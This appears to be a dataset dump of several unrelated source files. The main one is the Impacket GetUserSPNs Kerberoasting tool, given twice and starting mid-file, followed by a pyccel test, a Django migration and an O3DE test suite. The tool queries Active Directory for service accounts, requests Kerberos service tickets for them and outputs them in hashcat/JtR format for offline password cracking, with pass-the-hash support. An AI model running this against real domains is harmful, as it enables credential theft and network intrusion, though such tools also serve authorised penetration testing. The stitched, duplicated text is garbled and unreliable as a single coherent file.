outputFormat = ' '.join(['{%d:%ds} ' % (num, width) for num, width in enumerate(colLen)])
# Print header
print outputFormat.format(*header)
print ' '.join(['-' * itemLen for itemLen in colLen])
# And now the rows
for row in items:
print outputFormat.format(*row)
def __init__(self, username, password, domain, cmdLineOptions):
self.options = cmdLineOptions
self.__username = username
self.__password = password
self.__domain = domain
self.__lmhash = ''
self.__nthash = ''
self.__outputFileName = options.outputfile
self.__aesKey = cmdLineOptions.aesKey
self.__doKerberos = cmdLineOptions.k
self.__target = None
self.__requestTGS = options.request
self.__kdcHost = cmdLineOptions.dc_ip
self.__saveTGS = cmdLineOptions.save
self.__requestUser = cmdLineOptions.request_user
if cmdLineOptions.hashes is not None:
self.__lmhash, self.__nthash = cmdLineOptions.hashes.split(':')
# Create the baseDN
domainParts = self.__domain.split('.')
self.baseDN = ''
for i in domainParts:
self.baseDN += 'dc=%s,' % i
# Remove last ','
self.baseDN = self.baseDN[:-1]
def getMachineName(self):
if self.__kdcHost is not None:
s = SMBConnection(self.__kdcHost, self.__kdcHost)
else:
s = SMBConnection(self.__domain, self.__domain)
try:
s.login('', '')
except Exception:
logging.debug('Error while anonymous logging into %s' % self.__domain)
s.logoff()
return s.getServerName()
@staticmethod
def getUnixTime(t):
t -= 116444736000000000
t /= 10000000
return t
def getTGT(self):
try:
ccache = CCache.loadFile(os.getenv('KRB5CCNAME'))
except:
# No cache present
pass
else:
# retrieve user and domain information from CCache file if needed
if self.__domain == '':
domain = ccache.principal.realm['data']
else:
domain = self.__domain
logging.debug("Using Kerberos Cache: %s" % os.getenv('KRB5CCNAME'))
principal = 'krbtgt/%s@%s' % (domain.upper(), domain.upper())
creds = ccache.getCredential(principal)
if creds is not None:
TGT = creds.toTGT()
logging.debug('Using TGT from cache')
return TGT
else:
logging.debug("No valid credentials found in cache. ")
# No TGT in cache, request it
userName = Principal(self.__username, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
tgt, cipher, oldSessionKey, sessionKey = getKerberosTGT(userName, self.__password, self.__domain,
unhexlify(self.__lmhash),
unhexlify(self.__nthash), self.__aesKey,
kdcHost=self.__kdcHost)
TGT = {}
TGT['KDC_REP'] = tgt
TGT['cipher'] = cipher
TGT['sessionKey'] = sessionKey
return TGT
def outputTGS(self, tgs, oldSessionKey, sessionKey, username, spn, fd=None):
decodedTGS = decoder.decode(tgs, asn1Spec=TGS_REP())[0]
# According to RFC4757 the cipher part is like:
# struct EDATA {
# struct HEADER {
# OCTET Checksum[16];
# OCTET Confounder[8];
# } Header;
# OCTET Data[0];
# } edata;
#
# In short, we're interested in splitting the checksum and the rest of the encrypted data
#
if decodedTGS['ticket']['enc-part']['etype'] == constants.EncryptionTypes.rc4_hmac.value:
entry = '$krb5tgs$%d$*%s$%s$%s*$%s$%s' % (
constants.EncryptionTypes.rc4_hmac.value, username, decodedTGS['ticket']['realm'], spn.replace(':', '~'),
hexlify(str(decodedTGS['ticket']['enc-part']['cipher'][:16])),
hexlify(str(decodedTGS['ticket']['enc-part']['cipher'][16:])))
if fd is None:
print entry
else:
fd.write(entry+'\n')
else:
logging.error('Skipping %s/%s due to incompatible e-type %d' % (
decodedTGS['ticket']['sname']['name-string'][0], decodedTGS['ticket']['sname']['name-string'][1],
decodedTGS['ticket']['enc-part']['etype']))
if self.__saveTGS is True:
# Save the ticket
logging.debug('About to save TGS for %s' % username)
ccache = CCache()
try:
ccache.fromTGS(tgs, oldSessionKey, sessionKey )
ccache.saveFile('%s.ccache' % username)
except Exception, e:
logging.error(str(e))
def run(self):
if self.__doKerberos:
self.__target = self.getMachineName()
else:
if self.__kdcHost is not None:
self.__target = self.__kdcHost
else:
self.__target = self.__domain
# Connect to LDAP
try:
ldapConnection = ldap.LDAPConnection('ldap://%s'%self.__target, self.baseDN, self.__kdcHost)
if self.__doKerberos is not True:
ldapConnection.login(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash)
else:
ldapConnection.kerberosLogin(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash,
self.__aesKey, kdcHost=self.__kdcHost)
except ldap.LDAPSessionError, e:
if str(e).find('strongerAuthRequired') >= 0:
# We need to try SSL
ldapConnection = ldap.LDAPConnection('ldaps://%s' % self.__target, self.baseDN, self.__kdcHost)
if self.__doKerberos is not True:
ldapConnection.login(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash)
else:
ldapConnection.kerberosLogin(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash,
self.__aesKey, kdcHost=self.__kdcHost)
else:
raise
# Building the following filter:
# (&(servicePrincipalName=*)(UserAccountControl:1.2.840.113556.1.4.803:=512)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))
# (servicePrincipalName=*)
and0 = ldapasn1.Filter()
and0['present'] = ldapasn1.Present('servicePrincipalName')
# (UserAccountControl:1.2.840.113556.1.4.803:=512)
and1 = ldapasn1.Filter()
and1['extensibleMatch'] = ldapasn1.MatchingRuleAssertion()
and1['extensibleMatch']['matchingRule'] = ldapasn1.MatchingRuleId('1.2.840.113556.1.4.803')
and1['extensibleMatch']['type'] = ldapasn1.TypeDescription('UserAccountControl')
and1['extensibleMatch']['matchValue'] = ldapasn1.matchValueAssertion(UF_NORMAL_ACCOUNT)
and1['extensibleMatch']['dnAttributes'] = False
# !(UserAccountControl:1.2.840.113556.1.4.803:=2)
and2 = ldapasn1.Not()
and2['notFilter'] = ldapasn1.Filter()
and2['notFilter']['extensibleMatch'] = ldapasn1.MatchingRuleAssertion()
and2['notFilter']['extensibleMatch']['matchingRule'] = ldapasn1.MatchingRuleId('1.2.840.113556.1.4.803')
and2['notFilter']['extensibleMatch']['type'] = ldapasn1.TypeDescription('UserAccountControl')
and2['notFilter']['extensibleMatch']['matchValue'] = ldapasn1.matchValueAssertion(UF_ACCOUNTDISABLE)
and2['notFilter']['extensibleMatch']['dnAttributes'] = False
searchFilter = ldapasn1.Filter()
searchFilter['and'] = ldapasn1.And()
searchFilter['and'][0] = and0
searchFilter['and'][1] = and1
# searchFilter['and'][2] = and2
# Exception here, setting verifyConstraints to False so pyasn1 doesn't warn about incompatible tags
searchFilter['and'].setComponentByPosition(2,and2, verifyConstraints=False)
if self.__requestUser is not None:
#(sAMAccountName:=userSuppliedName)
logging.info('Gathering data for user %s' % self.__requestUser)
and3 = ldapasn1.EqualityMatch()
and3['attributeDesc'] = ldapasn1.AttributeDescription('sAMAccountName')
and3['assertionValue'] = ldapasn1.AssertionValue(self.__requestUser)
# searchFilter['and'][3] = and3
# Exception here, setting verifyConstraints to False so pyasn1 doesn't warn about incompatible tags
searchFilter['and'].setComponentByPosition(3, and3, verifyConstraints=False)
try:
resp = ldapConnection.search(searchFilter=searchFilter,
attributes=['servicePrincipalName', 'sAMAccountName',
'pwdLastSet', 'MemberOf', 'userAccountControl', 'lastLogon'],
sizeLimit=999)
except ldap.LDAPSearchError, e:
if e.getErrorString().find('sizeLimitExceeded') >= 0:
logging.debug('sizeLimitExceeded exception caught, giving up and processing the data received')
# We reached the sizeLimit, process the answers we have already and that's it. Until we implement
# paged queries
resp = e.getAnswers()
pass
else:
raise
answers = []
logging.debug('Total of records returned %d' % len(resp))
for item in resp:
if isinstance(item, ldapasn1.SearchResultEntry) is not True:
continue
mustCommit = False
sAMAccountName = ''
memberOf = ''
SPNs = []
pwdLastSet = ''
userAccountControl = 0
lastLogon = 'N/A'
try:
for attribute in item['attributes']:
if attribute['type'] == 'sAMAccountName':
if str(attribute['vals'][0]).endswith('$') is False:
# User Account
sAMAccountName = str(attribute['vals'][0])
mustCommit = True
elif attribute['type'] == 'userAccountControl':
userAccountControl = str(attribute['vals'][0])
elif attribute['type'] == 'memberOf':
memberOf = str(attribute['vals'][0])
elif attribute['type'] == 'pwdLastSet':
if str(attribute['vals'][0]) == '0':
pwdLastSet = '<never>'
else:
pwdLastSet = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
elif attribute['type'] == 'lastLogon':
if str(attribute['vals'][0]) == '0':
lastLogon = '<never>'
else:
lastLogon = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
elif attribute['type'] == 'servicePrincipalName':
for spn in attribute['vals']:
SPNs.append(str(spn))
if mustCommit is True:
if int(userAccountControl) & UF_ACCOUNTDISABLE:
logging.debug('Bypassing disabled account %s ' % sAMAccountName)
else:
for spn in SPNs:
answers.append([spn, sAMAccountName,memberOf, pwdLastSet, lastLogon])
except Exception, e:
logging.error('Skipping item, cannot process due to error %s' % str(e))
pass
if len(answers)>0:
self.printTable(answers, header=[ "ServicePrincipalName", "Name", "MemberOf", "PasswordLastSet", "LastLogon"])
print '\n\n'
if self.__requestTGS is True or self.__requestUser is not None:
# Let's get unique user names and a SPN to request a TGS for
users = dict( (vals[1], vals[0]) for vals in answers)
# Get a TGT for the current user
TGT = self.getTGT()
if self.__outputFileName is not None:
fd = open(self.__outputFileName, 'w+')
else:
fd = None
for user, SPN in users.iteritems():
try:
serverName = Principal(SPN, type=constants.PrincipalNameType.NT_SRV_INST.value)
tgs, cipher, oldSessionKey, sessionKey = getKerberosTGS(serverName, self.__domain,
self.__kdcHost,
TGT['KDC_REP'], TGT['cipher'],
TGT['sessionKey'])
self.outputTGS(tgs, oldSessionKey, sessionKey, user, SPN, fd)
except Exception , e:
logging.error(str(e))
if fd is not None:
fd.close()
else:
print "No entries found!"
# Process command-line arguments.
if __name__ == '__main__':
# Init the example's logger theme
logger.init()
print version.BANNER
parser = argparse.ArgumentParser(add_help = True, description = "Queries target domain for SPNs that are running "
"under a user account")
parser.add_argument('target', action='store', help='domain/username[:password]')
parser.add_argument('-request', action='store_true', default='False', help='Requests TGS for users and output them '
'in JtR/hashcat format (default False)')
parser.add_argument('-request-user', action='store', metavar='username', help='Requests TGS for the SPN associated '
'to the user specified (just the username, no domain needed)')
parser.add_argument('-save', action='store_true', default='False', help='Saves TGS requested to disk. Format is '
'<username>.ccache. Auto selects -request')
parser.add_argument('-outputfile', action='store',
help='Output filename to write ciphers in JtR/hashcat format')
parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
group = parser.add_argument_group('authentication')
group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
group.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)')
group.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file '
'(KRB5CCNAME) based on target parameters. If valid credentials '
'cannot be found, it will use the ones specified in the command '
'line')
group.add_argument('-aesKey', action="store", metavar = "hex key", help='AES key to use for Kerberos Authentication '
'(128 or 256 bits)')
group.add_argument('-dc-ip', action='store',metavar = "ip address", help='IP Address of the domain controller. If '
'ommited it use the domain part (FQDN) '
'specified in the target parameter')
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
options = parser.parse_args()
if options.debug is True:
logging.getLogger().setLevel(logging.DEBUG)
else:
logging.getLogger().setLevel(logging.INFO)
import re
# This is because I'm lazy with regex
# ToDo: We need to change the regex to fullfil domain/username[:password]
targetParam = options.target+'@'
domain, username, password, address = re.compile('(?:(?:([^/@:]*)/)?([^@:]*)(?::([^@]*))?@)?(.*)').match(targetParam).groups('')
#In case the password contains '@'
if '@' in address:
password = password + '@' + address.rpartition('@')[0]
address = address.rpartition('@')[2]
if domain is '':
logging.critical('Domain should be specified!')
sys.exit(1)
if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None:
from getpass import getpass
password = getpass("Password:")
if options.aesKey is not None:
options.k = True
if options.save is True or options.outputfile is not None:
options.request = True
try:
executer = GetUserSPNs(username, password, domain, options)
executer.run()
except Exception, e:
#import traceback
#print traceback.print_exc()
print str(e)
| 46.932401 | 161 | 0.568243 |
# will encrypt the ticket with the account the SPN is running under, this could be used for an offline
# bruteforcing attack of the SPNs account NTLM hash if we can gather valid TGS for those SPNs.
# This is part of the kerberoast attack researched by Tim Medin (@timmedin) and detailed at
# https://files.sans.org/summit/hackfest2014/PDFs/Kicking%20the%20Guard%20Dog%20of%20Hades%20-%20Attacking%20Microsoft%20Kerberos%20%20-%20Tim%20Medin(1).pdf
#
# Original idea of implementing this in Python belongs to @skelsec and his
# https://github.com/skelsec/PyKerberoast project
#
# This module provides a Python implementation for this attack, adding also the ability to PtH/Ticket/Key.
# Also, disabled accounts won't be shown.
# (play with userAccountControl)
#
import argparse
import logging
import os
import sys
from datetime import datetime
from binascii import hexlify, unhexlify
from pyasn1.codec.der import decoder
from impacket import version
from impacket.dcerpc.v5.samr import UF_ACCOUNTDISABLE, UF_NORMAL_ACCOUNT
from impacket.examples import logger
from impacket.krb5 import constants
from impacket.krb5.asn1 import TGS_REP
from impacket.krb5.ccache import CCache
from impacket.krb5.kerberosv5 import getKerberosTGT, getKerberosTGS
from impacket.krb5.types import Principal
from impacket.ldap import ldap, ldapasn1
from impacket.smbconnection import SMBConnection
class GetUserSPNs:
@staticmethod
def printTable(items, header):
colLen = []
for i, col in enumerate(header):
rowMaxLen = max([len(row[i]) for row in items])
colLen.append(max(rowMaxLen, len(col)))
outputFormat = ' '.join(['{%d:%ds} ' % (num, width) for num, width in enumerate(colLen)])
# Print header
print outputFormat.format(*header)
print ' '.join(['-' * itemLen for itemLen in colLen])
# And now the rows
for row in items:
print outputFormat.format(*row)
def __init__(self, username, password, domain, cmdLineOptions):
self.options = cmdLineOptions
self.__username = username
self.__password = password
self.__domain = domain
self.__lmhash = ''
self.__nthash = ''
self.__outputFileName = options.outputfile
self.__aesKey = cmdLineOptions.aesKey
self.__doKerberos = cmdLineOptions.k
self.__target = None
self.__requestTGS = options.request
self.__kdcHost = cmdLineOptions.dc_ip
self.__saveTGS = cmdLineOptions.save
self.__requestUser = cmdLineOptions.request_user
if cmdLineOptions.hashes is not None:
self.__lmhash, self.__nthash = cmdLineOptions.hashes.split(':')
# Create the baseDN
domainParts = self.__domain.split('.')
self.baseDN = ''
for i in domainParts:
self.baseDN += 'dc=%s,' % i
# Remove last ','
self.baseDN = self.baseDN[:-1]
def getMachineName(self):
if self.__kdcHost is not None:
s = SMBConnection(self.__kdcHost, self.__kdcHost)
else:
s = SMBConnection(self.__domain, self.__domain)
try:
s.login('', '')
except Exception:
logging.debug('Error while anonymous logging into %s' % self.__domain)
s.logoff()
return s.getServerName()
@staticmethod
def getUnixTime(t):
t -= 116444736000000000
t /= 10000000
return t
def getTGT(self):
try:
ccache = CCache.loadFile(os.getenv('KRB5CCNAME'))
except:
# No cache present
pass
else:
# retrieve user and domain information from CCache file if needed
if self.__domain == '':
domain = ccache.principal.realm['data']
else:
domain = self.__domain
logging.debug("Using Kerberos Cache: %s" % os.getenv('KRB5CCNAME'))
principal = 'krbtgt/%s@%s' % (domain.upper(), domain.upper())
creds = ccache.getCredential(principal)
if creds is not None:
TGT = creds.toTGT()
logging.debug('Using TGT from cache')
return TGT
else:
logging.debug("No valid credentials found in cache. ")
# No TGT in cache, request it
userName = Principal(self.__username, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
tgt, cipher, oldSessionKey, sessionKey = getKerberosTGT(userName, self.__password, self.__domain,
unhexlify(self.__lmhash),
unhexlify(self.__nthash), self.__aesKey,
kdcHost=self.__kdcHost)
TGT = {}
TGT['KDC_REP'] = tgt
TGT['cipher'] = cipher
TGT['sessionKey'] = sessionKey
return TGT
def outputTGS(self, tgs, oldSessionKey, sessionKey, username, spn, fd=None):
decodedTGS = decoder.decode(tgs, asn1Spec=TGS_REP())[0]
# According to RFC4757 the cipher part is like:
# struct EDATA {
# struct HEADER {
# OCTET Checksum[16];
# OCTET Confounder[8];
# } Header;
# OCTET Data[0];
# } edata;
#
# In short, we're interested in splitting the checksum and the rest of the encrypted data
if decodedTGS['ticket']['enc-part']['etype'] == constants.EncryptionTypes.rc4_hmac.value:
entry = '$krb5tgs$%d$*%s$%s$%s*$%s$%s' % (
constants.EncryptionTypes.rc4_hmac.value, username, decodedTGS['ticket']['realm'], spn.replace(':', '~'),
hexlify(str(decodedTGS['ticket']['enc-part']['cipher'][:16])),
hexlify(str(decodedTGS['ticket']['enc-part']['cipher'][16:])))
if fd is None:
print entry
else:
fd.write(entry+'\n')
else:
logging.error('Skipping %s/%s due to incompatible e-type %d' % (
decodedTGS['ticket']['sname']['name-string'][0], decodedTGS['ticket']['sname']['name-string'][1],
decodedTGS['ticket']['enc-part']['etype']))
if self.__saveTGS is True:
logging.debug('About to save TGS for %s' % username)
ccache = CCache()
try:
ccache.fromTGS(tgs, oldSessionKey, sessionKey )
ccache.saveFile('%s.ccache' % username)
except Exception, e:
logging.error(str(e))
def run(self):
if self.__doKerberos:
self.__target = self.getMachineName()
else:
if self.__kdcHost is not None:
self.__target = self.__kdcHost
else:
self.__target = self.__domain
try:
ldapConnection = ldap.LDAPConnection('ldap://%s'%self.__target, self.baseDN, self.__kdcHost)
if self.__doKerberos is not True:
ldapConnection.login(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash)
else:
ldapConnection.kerberosLogin(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash,
self.__aesKey, kdcHost=self.__kdcHost)
except ldap.LDAPSessionError, e:
if str(e).find('strongerAuthRequired') >= 0:
ldapConnection = ldap.LDAPConnection('ldaps://%s' % self.__target, self.baseDN, self.__kdcHost)
if self.__doKerberos is not True:
ldapConnection.login(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash)
else:
ldapConnection.kerberosLogin(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash,
self.__aesKey, kdcHost=self.__kdcHost)
else:
raise
and0 = ldapasn1.Filter()
and0['present'] = ldapasn1.Present('servicePrincipalName')
and1 = ldapasn1.Filter()
and1['extensibleMatch'] = ldapasn1.MatchingRuleAssertion()
and1['extensibleMatch']['matchingRule'] = ldapasn1.MatchingRuleId('1.2.840.113556.1.4.803')
and1['extensibleMatch']['type'] = ldapasn1.TypeDescription('UserAccountControl')
and1['extensibleMatch']['matchValue'] = ldapasn1.matchValueAssertion(UF_NORMAL_ACCOUNT)
and1['extensibleMatch']['dnAttributes'] = False
and2 = ldapasn1.Not()
and2['notFilter'] = ldapasn1.Filter()
and2['notFilter']['extensibleMatch'] = ldapasn1.MatchingRuleAssertion()
and2['notFilter']['extensibleMatch']['matchingRule'] = ldapasn1.MatchingRuleId('1.2.840.113556.1.4.803')
and2['notFilter']['extensibleMatch']['type'] = ldapasn1.TypeDescription('UserAccountControl')
and2['notFilter']['extensibleMatch']['matchValue'] = ldapasn1.matchValueAssertion(UF_ACCOUNTDISABLE)
and2['notFilter']['extensibleMatch']['dnAttributes'] = False
searchFilter = ldapasn1.Filter()
searchFilter['and'] = ldapasn1.And()
searchFilter['and'][0] = and0
searchFilter['and'][1] = and1
searchFilter['and'].setComponentByPosition(2,and2, verifyConstraints=False)
if self.__requestUser is not None:
#(sAMAccountName:=userSuppliedName)
logging.info('Gathering data for user %s' % self.__requestUser)
and3 = ldapasn1.EqualityMatch()
and3['attributeDesc'] = ldapasn1.AttributeDescription('sAMAccountName')
and3['assertionValue'] = ldapasn1.AssertionValue(self.__requestUser)
# searchFilter['and'][3] = and3
# Exception here, setting verifyConstraints to False so pyasn1 doesn't warn about incompatible tags
searchFilter['and'].setComponentByPosition(3, and3, verifyConstraints=False)
try:
resp = ldapConnection.search(searchFilter=searchFilter,
attributes=['servicePrincipalName', 'sAMAccountName',
'pwdLastSet', 'MemberOf', 'userAccountControl', 'lastLogon'],
sizeLimit=999)
except ldap.LDAPSearchError, e:
if e.getErrorString().find('sizeLimitExceeded') >= 0:
logging.debug('sizeLimitExceeded exception caught, giving up and processing the data received')
# paged queries
resp = e.getAnswers()
pass
else:
raise
answers = []
logging.debug('Total of records returned %d' % len(resp))
for item in resp:
if isinstance(item, ldapasn1.SearchResultEntry) is not True:
continue
mustCommit = False
sAMAccountName = ''
memberOf = ''
SPNs = []
pwdLastSet = ''
userAccountControl = 0
lastLogon = 'N/A'
try:
for attribute in item['attributes']:
if attribute['type'] == 'sAMAccountName':
if str(attribute['vals'][0]).endswith('$') is False:
# User Account
sAMAccountName = str(attribute['vals'][0])
mustCommit = True
elif attribute['type'] == 'userAccountControl':
userAccountControl = str(attribute['vals'][0])
elif attribute['type'] == 'memberOf':
memberOf = str(attribute['vals'][0])
elif attribute['type'] == 'pwdLastSet':
if str(attribute['vals'][0]) == '0':
pwdLastSet = '<never>'
else:
pwdLastSet = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
elif attribute['type'] == 'lastLogon':
if str(attribute['vals'][0]) == '0':
lastLogon = '<never>'
else:
lastLogon = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
elif attribute['type'] == 'servicePrincipalName':
for spn in attribute['vals']:
SPNs.append(str(spn))
if mustCommit is True:
if int(userAccountControl) & UF_ACCOUNTDISABLE:
logging.debug('Bypassing disabled account %s ' % sAMAccountName)
else:
for spn in SPNs:
answers.append([spn, sAMAccountName,memberOf, pwdLastSet, lastLogon])
except Exception, e:
logging.error('Skipping item, cannot process due to error %s' % str(e))
pass
if len(answers)>0:
self.printTable(answers, header=[ "ServicePrincipalName", "Name", "MemberOf", "PasswordLastSet", "LastLogon"])
print '\n\n'
if self.__requestTGS is True or self.__requestUser is not None:
# Let's get unique user names and a SPN to request a TGS for
users = dict( (vals[1], vals[0]) for vals in answers)
TGT = self.getTGT()
if self.__outputFileName is not None:
fd = open(self.__outputFileName, 'w+')
else:
fd = None
for user, SPN in users.iteritems():
try:
serverName = Principal(SPN, type=constants.PrincipalNameType.NT_SRV_INST.value)
tgs, cipher, oldSessionKey, sessionKey = getKerberosTGS(serverName, self.__domain,
self.__kdcHost,
TGT['KDC_REP'], TGT['cipher'],
TGT['sessionKey'])
self.outputTGS(tgs, oldSessionKey, sessionKey, user, SPN, fd)
except Exception , e:
logging.error(str(e))
if fd is not None:
fd.close()
else:
print "No entries found!"
if __name__ == '__main__':
logger.init()
print version.BANNER
parser = argparse.ArgumentParser(add_help = True, description = "Queries target domain for SPNs that are running "
"under a user account")
parser.add_argument('target', action='store', help='domain/username[:password]')
parser.add_argument('-request', action='store_true', default='False', help='Requests TGS for users and output them '
'in JtR/hashcat format (default False)')
parser.add_argument('-request-user', action='store', metavar='username', help='Requests TGS for the SPN associated '
'to the user specified (just the username, no domain needed)')
parser.add_argument('-save', action='store_true', default='False', help='Saves TGS requested to disk. Format is '
'<username>.ccache. Auto selects -request')
parser.add_argument('-outputfile', action='store',
help='Output filename to write ciphers in JtR/hashcat format')
parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
group = parser.add_argument_group('authentication')
group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
group.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)')
group.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file '
'(KRB5CCNAME) based on target parameters. If valid credentials '
'cannot be found, it will use the ones specified in the command '
'line')
group.add_argument('-aesKey', action="store", metavar = "hex key", help='AES key to use for Kerberos Authentication '
'(128 or 256 bits)')
group.add_argument('-dc-ip', action='store',metavar = "ip address", help='IP Address of the domain controller. If '
'ommited it use the domain part (FQDN) '
'specified in the target parameter')
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
options = parser.parse_args()
if options.debug is True:
logging.getLogger().setLevel(logging.DEBUG)
else:
logging.getLogger().setLevel(logging.INFO)
import re
# ToDo: We need to change the regex to fullfil domain/username[:password]
targetParam = options.target+'@'
domain, username, password, address = re.compile('(?:(?:([^/@:]*)/)?([^@:]*)(?::([^@]*))?@)?(.*)').match(targetParam).groups('')
#In case the password contains '@'
if '@' in address:
password = password + '@' + address.rpartition('@')[0]
address = address.rpartition('@')[2]
if domain is '':
logging.critical('Domain should be specified!')
sys.exit(1)
if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None:
from getpass import getpass
password = getpass("Password:")
if options.aesKey is not None:
options.k = True
if options.save is True or options.outputfile is not None:
options.request = True
try:
executer = GetUserSPNs(username, password, domain, options)
executer.run()
except Exception, e:
#import traceback
#print traceback.print_exc()
print str(e)
| false | true |
f72376b693b2c15acbb9f4539d2913c118aebefc | 617 | py | Python | tests/codegen/ccode/scripts/arrays_pointers.py | dina-fouad/pyccel | f4d919e673b400442b9c7b81212b6fbef749c7b7 | [
"MIT"
] | 206 | 2018-06-28T00:28:47.000Z | 2022-03-29T05:17:03.000Z | tests/codegen/ccode/scripts/arrays_pointers.py | dina-fouad/pyccel | f4d919e673b400442b9c7b81212b6fbef749c7b7 | [
"MIT"
] | 670 | 2018-07-23T11:02:24.000Z | 2022-03-30T07:28:05.000Z | tests/codegen/ccode/scripts/arrays_pointers.py | dina-fouad/pyccel | f4d919e673b400442b9c7b81212b6fbef749c7b7 | [
"MIT"
] | 19 | 2019-09-19T06:01:00.000Z | 2022-03-29T05:17:06.000Z | # pylint: disable=missing-function-docstring, missing-module-docstring/
#==============================================================================
def allocatable_to_pointer():
from numpy import array
a = array([1, 2, 3, 4, 5, 6, 7, 8, 9, 10])
c = a #pylint:disable=unused-variable
def pointer_to_pointer():
from numpy import array
a = array([1, 2, 3, 4, 5, 6, 7, 8, 9, 10])
b = a
c = b #pylint:disable=unused-variable
def reassign_pointers():
from numpy import array
a = array([1, 2, 3, 4, 5, 6, 7, 8, 9, 10])
b = a #pylint:disable=unused-variable
b = a[1:]
| 23.730769 | 79 | 0.531605 |
def allocatable_to_pointer():
from numpy import array
a = array([1, 2, 3, 4, 5, 6, 7, 8, 9, 10])
c = a
def pointer_to_pointer():
from numpy import array
a = array([1, 2, 3, 4, 5, 6, 7, 8, 9, 10])
b = a
c = b
def reassign_pointers():
from numpy import array
a = array([1, 2, 3, 4, 5, 6, 7, 8, 9, 10])
b = a
b = a[1:]
| true | true |
f72376ccbed4c815899d44928f38fb797d9853a2 | 299 | py | Python | posthog/migrations/0049_delete_funnelstep.py | Jujhar/posthog | d4df76250632f84b830b76b0ec48caaafbed568f | [
"MIT"
] | 1 | 2020-07-02T12:25:41.000Z | 2020-07-02T12:25:41.000Z | posthog/migrations/0049_delete_funnelstep.py | Jujhar/posthog | d4df76250632f84b830b76b0ec48caaafbed568f | [
"MIT"
] | 1 | 2020-04-25T13:19:59.000Z | 2020-04-25T13:20:17.000Z | posthog/migrations/0049_delete_funnelstep.py | Jujhar/posthog | d4df76250632f84b830b76b0ec48caaafbed568f | [
"MIT"
] | 1 | 2020-06-24T07:59:41.000Z | 2020-06-24T07:59:41.000Z | # Generated by Django 3.0.3 on 2020-04-21 10:08
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('posthog', '0048_auto_20200420_1051'),
]
operations = [
migrations.DeleteModel(
name='FunnelStep',
),
]
| 17.588235 | 47 | 0.608696 |
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('posthog', '0048_auto_20200420_1051'),
]
operations = [
migrations.DeleteModel(
name='FunnelStep',
),
]
| true | true |
f723770420dd7d271b2a220e8e34b5abf9201f58 | 4,622 | py | Python | AutomatedTesting/Gem/PythonTests/largeworlds/landscape_canvas/TestSuite_Main.py | BreakerOfThings/o3de | f4c59f868c726470ec910623facd836047d059c3 | [
"Apache-2.0",
"MIT"
] | 1 | 2022-03-28T08:06:58.000Z | 2022-03-28T08:06:58.000Z | AutomatedTesting/Gem/PythonTests/largeworlds/landscape_canvas/TestSuite_Main.py | BreakerOfThings/o3de | f4c59f868c726470ec910623facd836047d059c3 | [
"Apache-2.0",
"MIT"
] | null | null | null | AutomatedTesting/Gem/PythonTests/largeworlds/landscape_canvas/TestSuite_Main.py | BreakerOfThings/o3de | f4c59f868c726470ec910623facd836047d059c3 | [
"Apache-2.0",
"MIT"
] | null | null | null | """
Copyright (c) Contributors to the Open 3D Engine Project.
For complete copyright and license terms please see the LICENSE at the root of this distribution.
SPDX-License-Identifier: Apache-2.0 OR MIT
"""
import pytest
from ly_test_tools.o3de.editor_test import EditorSingleTest, EditorSharedTest, EditorParallelTest, EditorTestSuite
@pytest.mark.parametrize("launcher_platform", ['windows_editor'])
@pytest.mark.parametrize("project", ["AutomatedTesting"])
class TestAutomation(EditorTestSuite):
class test_LandscapeCanvas_AreaNodes_DependentComponentsAdded(EditorSharedTest):
from .EditorScripts import AreaNodes_DependentComponentsAdded as test_module
class test_LandscapeCanvas_AreaNodes_EntityCreatedOnNodeAdd(EditorSharedTest):
from .EditorScripts import AreaNodes_EntityCreatedOnNodeAdd as test_module
class test_LandscapeCanvas_AreaNodes_EntityRemovedOnNodeDelete(EditorSharedTest):
from .EditorScripts import AreaNodes_EntityRemovedOnNodeDelete as test_module
class test_LandscapeCanvas_Component_AddedRemoved(EditorSharedTest):
from .EditorScripts import Component_AddedRemoved as test_module
class test_LandscapeCanvas_ComponentUpdates_UpdateGraph(EditorSharedTest):
from .EditorScripts import ComponentUpdates_UpdateGraph as test_module
class test_LandscapeCanvas_Edit_DisabledNodeDuplication(EditorSharedTest):
from .EditorScripts import Edit_DisabledNodeDuplication as test_module
class test_LandscapeCanvas_Edit_UndoNodeDelete_PrefabEntity(EditorSharedTest):
from .EditorScripts import Edit_UndoNodeDelete_PrefabEntity as test_module
class test_LandscapeCanvas_GradientMixer_NodeConstruction(EditorSharedTest):
from .EditorScripts import GradientMixer_NodeConstruction as test_module
class test_LandscapeCanvas_GradientModifierNodes_EntityCreatedOnNodeAdd(EditorSharedTest):
from .EditorScripts import GradientModifierNodes_EntityCreatedOnNodeAdd as test_module
class test_LandscapeCanvas_GradientModifierNodes_EntityRemovedOnNodeDelete(EditorSharedTest):
from .EditorScripts import GradientModifierNodes_EntityRemovedOnNodeDelete as test_module
